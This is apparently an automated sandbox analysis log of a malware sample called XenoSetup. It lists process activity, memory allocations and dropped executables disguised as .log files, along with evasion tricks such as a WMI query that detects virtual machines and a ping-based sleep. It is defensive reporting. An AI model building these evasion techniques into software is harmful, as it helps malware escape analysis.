Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Memory allocated: 1590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Memory allocated: 1B110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 14B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 1B240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Memory allocated: 1340000 memory reserve \| memory write watch
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Memory allocated: 1AF80000 memory reserve \| memory write watch
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Memory allocated: 12E0000 memory reserve \| memory write watch
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Memory allocated: 1ADC0000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 930000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 1A3E0000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: D40000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 1A940000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 27B0000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 1A9C0000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 12A0000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 1B010000 memory reserve \| memory write watch
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Memory allocated: 950000 memory reserve \| memory write watch
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Memory allocated: 1A4D0000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 27D0000 memory reserve \| memory write watch
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Memory allocated: 1AA30000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5551			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4174			Jump to behavior

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jCRLjesV.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ogLKbooN.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tBjJkMRH.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KZGGSUqY.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BFVQSOun.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UWIwmTED.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dQveIBvX.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gQJUAkON.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BOtQCANk.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NoWOUMSl.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FSpHSmDL.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RPLnQAKH.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eDXMSiYF.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\paukoYZl.log	Jump to dropped file
